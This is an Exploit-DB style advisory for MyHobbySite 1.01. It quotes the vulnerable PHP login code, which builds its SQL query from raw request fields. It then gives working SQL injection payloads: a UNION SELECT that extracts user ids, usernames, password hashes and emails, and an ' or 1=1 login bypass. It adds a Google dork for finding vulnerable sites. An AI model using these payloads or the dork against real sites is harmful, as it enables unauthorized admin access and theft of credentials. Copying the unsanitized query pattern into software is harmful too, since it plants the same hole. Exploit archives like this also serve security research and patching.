exploit-db-mirror/exploits/php/webapps/14977.txt

#########################################################################################
# Exploit Title: MyHobbySite 1.01 SQL injection, Bypass Authentication Vulnerability
# Date: 12-09-2010
# Author: YuGj VN
# Email: anhtuanittn.vn@gmail.com
# Software Link: http://www.myhobbysite.net/index.php?page=15
# Version: v1.01
#########################################################################################

Bug Code:
if (isset($_REQUEST['username']) and isset($_REQUEST['password'])) {
	// Get user info from the dataabse
	$_REQUEST['username'] = trim($_REQUEST['username']);
	$_REQUEST['password'] = trim($_REQUEST['password']);
	$usersettings = @mysql_query("SELECT * FROM " . $CONFIG['database_table_prefix'] . "users WHERE username='$_REQUEST[username]' AND password=md5('$_REQUEST[password]')");
	$usersettings = mysql_fetch_array($usersettings);
	if ($usersettings) {
		$_SESSION['logged_in'] = TRUE;
		$_SESSION['userid'] = $usersettings['id'];
		$_SESSION['user'] = $usersettings['username'];
		$_SESSION['pass'] = $usersettings['password'];
		$_SESSION['email'] = $usersettings['email'];
		$_SESSION['permissions'] = $usersettings['permissions'];
		UpdateLogs($usersettings['username'] . " logged into the Admin CP.");
	} else {
		$failed_login = TRUE;
	}
}

#########################################################################################

Exploit:

link exploit:  http://domain.com/admin/
# Enter in username field: ' union select 1,concat_ws(0x3a,id,username,password,email),3,4,5 from mhs_users-- -
# Enter in password field: ' union select 1,concat_ws(0x3a,id,username,password,email),3,4,5 from mhs_users-- -
# or
# Enter in username field: ' or 1=1-- -
# Enter in password field: ' or 1=1-- -
#
#
# We can exploit only when magic_quote_gpc = Off
# Google dork: Powered by MyHobbySite 1.01
#
#
#########################################################################################